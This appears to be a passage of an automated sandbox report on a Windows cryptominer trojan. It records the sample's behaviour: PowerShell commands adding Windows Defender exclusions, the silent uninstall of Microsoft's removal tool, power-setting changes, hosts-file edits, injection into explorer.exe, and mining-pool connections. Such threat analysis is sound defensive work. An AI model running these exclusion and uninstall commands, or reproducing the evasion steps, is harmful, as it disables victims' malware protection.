                Adds a directory exclusion to Windows Defender
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -ForceJump to behavior
                Found direct / indirect Syscall (likely to bypass EDR)
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtQueryInformationProcess: Indirect: 0x7FF7A0307C13Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtSetInformationThread: Indirect: 0x7FF7DA4D9F83Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtQuerySystemInformation: Indirect: 0x7FF7DA4A49B3Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtQuerySystemInformation: Indirect: 0x7FF7A02D49B3Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtSetInformationThread: Indirect: 0x7FF7A0309F83Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF7DA4D7C13Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeNtQueryInformationProcess: Indirect: 0x7FF7DA4D2A27Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeNtQueryInformationProcess: Indirect: 0x7FF7A0302A27Jump to behavior
                Injects code into the Windows Explorer (explorer.exe)
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140000000 value: 4DJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140001000 value: 40Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140360000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 1404C8000 value: 20Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 1407FB000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 14081B000 value: 48Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 14081C000 value: 48Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 14081F000 value: 48Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140821000 value: CEJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140822000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: 140823000 value: 00Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeMemory written: PID: 6476 base: E05010 value: 00Jump to behavior
                Modifies the context of a thread in another process (thread injection)
                Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 3924Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeThread register set: target process: 6476Jump to behavior
                Modifies the hosts file
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exeJump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\explorer.exe explorer.exeJump to behavior
                Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wusa.exe wusa /uninstall /kb:890830 /quiet /norestartJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Lowering of HIPS / PFW / Operating System Security Settings

                barindex
                Modifies power options to not sleep / hibernate
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0Jump to behavior
                Source: C:\ProgramData\Google\Chrome\updater.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0Jump to behavior
                Modifies the hosts file
                Source: C:\Users\user\Desktop\TwrhjEKqxk.exeFile written: C:\Windows\System32\drivers\etc\hostsJump to behavior
                Source: explorer.exe, 0000003B.00000002.4507932158.000000000118B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3450981482.000000000118B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3455732811.000000000118B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: procexp.exe

                Mitre Att&ck Matrix

                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts31
                Windows Management Instrumentation                		11
                Windows Service                		11
                Windows Service                		1
                Masquerading                		OS Credential Dumping751
                Security Software Discovery                		Remote Services1
                Archive Collected Data                		1
                Encrypted Channel                		Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault Accounts1
                Service Execution                		1
                DLL Side-Loading                		311
                Process Injection                		1
                File and Directory Permissions Modification                		LSASS Memory1
                Process Discovery                		Remote Desktop ProtocolData from Removable Media1
                Non-Standard Port                		Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Abuse Elevation Control Mechanism                		1
                Disable or Modify Tools                		Security Account Manager361
                Virtualization/Sandbox Evasion                		SMB/Windows Admin SharesData from Network Shared Drive1
                Non-Application Layer Protocol                		Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading                		361
                Virtualization/Sandbox Evasion                		NTDS1
                Application Window Discovery                		Distributed Component Object ModelInput Capture1
                Application Layer Protocol                		Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                Process Injection                		LSA Secrets1
                Remote System Discovery                		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism                		Cached Domain Credentials34
                System Information Discovery                		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items2
                Obfuscated Files or Information                		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job2
                Software Packing                		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading                		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                File Deletion                		Network SniffingNetwork Service DiscoveryShared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement

                Behavior Graph

                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1527556 Sample: TwrhjEKqxk.exe Startdate: 07/10/2024 Architecture: WINDOWS Score: 100 60 xmr-eu1.nanopool.org 2->60 70 Multi AV Scanner detection for domain / URL 2->70 72 Malicious sample detected (through community Yara rule) 2->72 74 Antivirus / Scanner detection for submitted sample 2->74 78 7 other signatures 2->78 8 updater.exe 1 2->8         started        12 TwrhjEKqxk.exe 1 3 2->12         started        14 svchost.exe 2->14         started        signatures3 76 DNS related to crypt mining pools 60->76 process4 file5 52 C:\Windows\Temp\mnidgyzvuran.sys, PE32+ 8->52 dropped 80 Antivirus detection for dropped file 8->80 82 Multi AV Scanner detection for dropped file 8->82 84 Query firmware table information (likely to detect VMs) 8->84 92 10 other signatures 8->92 16 explorer.exe 8->16         started        20 powershell.exe 23 8->20         started        22 cmd.exe 1 8->22         started        30 10 other processes 8->30 54 C:\ProgramDatabehaviorgraphoogle\Chrome\updater.exe, PE32+ 12->54 dropped 56 C:\Windows\System32\drivers\etc\hosts, ASCII 12->56 dropped 86 Uses powercfg.exe to modify the power settings 12->86 88 Modifies the hosts file 12->88 90 Adds a directory exclusion to Windows Defender 12->90 24 powershell.exe 22 12->24         started        26 cmd.exe 1 12->26         started        28 powercfg.exe 1 12->28         started        32 12 other processes 12->32 signatures6 process7 dnsIp8 58 162.19.224.121, 10343, 49704 CENTURYLINK-US-LEGACY-QWESTUS United States 16->58 62 System process connects to network (likely due to code injection or exploit) 16->62 64 Query firmware table information (likely to detect VMs) 16->64 66 Tries to detect sandboxes and other dynamic analysis tools (process name or module or function) 16->66 34 conhost.exe 20->34         started        46 2 other processes 22->46 68 Loading BitLocker PowerShell Module 24->68 36 conhost.exe 24->36         started        38 conhost.exe 26->38         started        40 wusa.exe 26->40         started        42 conhost.exe 28->42         started        48 9 other processes 30->48 44 conhost.exe 32->44         started        50 11 other processes 32->50 signatures9 process10

                Screenshots

                Thumbnails

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand

                Antivirus, Machine Learning and Genetic Malware Detection

                Initial Sample

                SourceDetectionScannerLabelLink
                TwrhjEKqxk.exe55%ReversingLabsWin64.Trojan.Cerbu
                TwrhjEKqxk.exe46%VirustotalBrowse
                TwrhjEKqxk.exe100%AviraHEUR/AGEN.1362845

                Dropped Files

                SourceDetectionScannerLabelLink
                C:\ProgramData\Google\Chrome\updater.exe100%AviraHEUR/AGEN.1362845
                C:\ProgramData\Google\Chrome\updater.exe55%ReversingLabsWin64.Trojan.Cerbu
                C:\ProgramData\Google\Chrome\updater.exe46%VirustotalBrowse
                C:\Windows\Temp\mnidgyzvuran.sys5%ReversingLabs
                C:\Windows\Temp\mnidgyzvuran.sys4%VirustotalBrowse

                Unpacked PE Files

                No Antivirus matches

                Domains

                SourceDetectionScannerLabelLink
                xmr-eu1.nanopool.org5%VirustotalBrowse

                URLs

                SourceDetectionScannerLabelLink
                http://ocsp.cloudflare.com/origin_ca00%VirustotalBrowse
                http://crl.cloudflare.com/origin_ca.crl00%VirustotalBrowse
                http://crl.cloudflare.com/origin_ca.crln0%VirustotalBrowse
                http://crl.cloudflare.com/origin_ca.crl0%VirustotalBrowse
                https://xmrig.com/docs/algorithms2%VirustotalBrowse
                http://ocsp.cloudflare.com/origin_ca0%VirustotalBrowse

                Domains and IPs

                Contacted Domains

                NameIPActiveMaliciousAntivirus DetectionReputation
                xmr-eu1.nanopool.org
                		54.37.137.114
                		truetrueunknown

                URLs from Memory and Binaries

                NameSourceMaliciousAntivirus DetectionReputation
                http://crl.cloudflare.com/origin_ca.crl0explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://ocsp.cloudflare.com/origin_caexplorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://crl.cloudflare.com/origin_ca.crlnexplorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://ocsp.cloudflare.com/origin_ca0explorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000112D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                http://crl.cloudflare.com/origin_ca.crlexplorer.exe, 0000003B.00000003.3457810885.000000000111B000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000003.3457810885.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507448971.00000000010FE000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000117A000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000003B.00000002.4507671698.000000000111B000.00000004.00000020.00020000.00000000.sdmpfalseunknown
                https://xmrig.com/docs/algorithmsupdater.exe, 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmpfalseunknown

                World Map of Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public IPs

                IPDomainCountryFlagASNASN NameMalicious
                162.19.224.121
                		unknownUnited States
                		209CENTURYLINK-US-LEGACY-QWESTUStrue

                General Information

                Joe Sandbox version:41.0.0 Charoite
                Analysis ID:1527556
                Start date and time:2024-10-07 03:02:09 +02:00
                Joe Sandbox product:CloudBasic
                Overall analysis duration:0h 9m 8s
                Hypervisor based Inspection enabled:false
                Report type:full
                Cookbook file name:default.jbs
                Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                Number of analysed new started processes analysed:63
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Sample name:TwrhjEKqxk.exe
                renamed because original name is a hash value
                Original Sample Name:dbf8d8ef015846d4078466a7c1d3f41c.exe
                Detection:MAL
                Classification:mal100.adwa.spyw.evad.mine.winEXE@82/13@1/1
                EGA Information:
                • Successful, ratio: 100%
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 1
                • Number of non-executed functions: 9
                Cookbook Comments:
                • Found application associated with file extension: .exe
                • Override analysis time to 240000 for current running targets taking high CPU consumption

                Warnings

                • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe
                • Excluded IPs from analysis (whitelisted): 172.202.163.200, 93.184.221.240, 13.95.31.18
                • Excluded domains from analysis (whitelisted): otelrules.azureedge.net, slscr.update.microsoft.com, ctldl.windowsupdate.com.delivery.microsoft.com, wu.ec.azureedge.net, ctldl.windowsupdate.com, wu.azureedge.net, fe3cr.delivery.mp.microsoft.com, fe3.delivery.mp.microsoft.com, ocsp.digicert.com, bg.apr-52dd2-0503.edgecastdns.net, cs11.wpc.v0cdn.net, glb.cws.prod.dcat.dsp.trafficmanager.net, sls.update.microsoft.com, hlb.apr-52dd2-0.edgecastdns.net, wu-b-net.trafficmanager.net, glb.sls.prod.dcat.dsp.trafficmanager.net
                • Not all processes where analyzed, report is missing behavior information
                • Report size exceeded maximum capacity and may have missing behavior information.
                • Report size getting too big, too many NtCreateKey calls found.

                Simulations

                Behavior and APIs

                TimeTypeDescription
                03:02:52Task SchedulerRun new task: {040FC3BF-8CDC-41EC-B1EE-D555FF3E6D13} path: .
                21:03:02API Interceptor1x Sleep call for process: TwrhjEKqxk.exe modified
                21:03:04API Interceptor36x Sleep call for process: powershell.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                162.19.224.121Xbox.exeGet hashmaliciousXWorm, XmrigBrowse
                  ft1i6jvAdD.exeGet hashmaliciousXmrigBrowse

                    Domains

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    xmr-eu1.nanopool.orgaA45th2ixY.exeGet hashmaliciousXmrigBrowse
                    • 162.19.224.121
                    S0FTWARE.exeGet hashmaliciousGo Injector, Vidar, XmrigBrowse
                    • 162.19.224.121
                    Gw2G72kSsY.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    file.exeGet hashmaliciousXmrigBrowse
                    • 163.172.154.142
                    BWP2uPDDxw.exeGet hashmaliciousXmrigBrowse
                    • 163.172.154.142
                    BkkZPdT1uc.exeGet hashmaliciousXmrigBrowse
                    • 54.37.232.103
                    Chrome.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    SetLoader.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    ekBTbONX85.exeGet hashmaliciousXmrigBrowse
                    • 51.15.58.224
                    yLfAxBEcuo.exeGet hashmaliciousCryptbot, Vidar, XmrigBrowse
                    • 212.47.253.124

                    ASNs

                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                    CENTURYLINK-US-LEGACY-QWESTUSZEjcJZcrXc.elfGet hashmaliciousMiraiBrowse
                    • 75.174.251.9
                    na.elfGet hashmaliciousUnknownBrowse
                    • 63.231.92.27
                    na.elfGet hashmaliciousMirai, OkiruBrowse
